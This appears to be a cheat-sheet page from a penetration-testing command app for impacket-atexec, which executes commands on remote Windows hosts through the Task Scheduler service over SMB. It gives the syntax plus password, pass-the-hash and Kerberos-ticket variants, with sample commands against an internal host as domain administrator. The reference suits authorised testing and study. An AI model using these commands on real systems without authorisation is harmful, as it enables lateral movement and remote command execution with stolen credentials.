Impacket AtExec

Execute commands via Windows Task Scheduler service

Tool
impacket-atexec
Category
Lateral Movement / Remote Shells
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-atexec '<domain>/<user>:<password>@<ip>' 'whoami'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-atexec -hashes ':<hash>' '<domain>/<user>@<ip>' 'whoami'

Kerberos Ticket requires Kerberos ticket

impacket-atexec -k -no-pass '<domain>/<user>@<ip>' 'whoami'

Examples

impacket-atexec 'CORP/administrator:password@192.168.1.100' 'whoami'
impacket-atexec -hashes ':e19ccf75ee54e06b06a5907af13cef42' 'CORP/administrator@192.168.1.100' 'whoami'

Tags

impacket atexec task-scheduler shell execution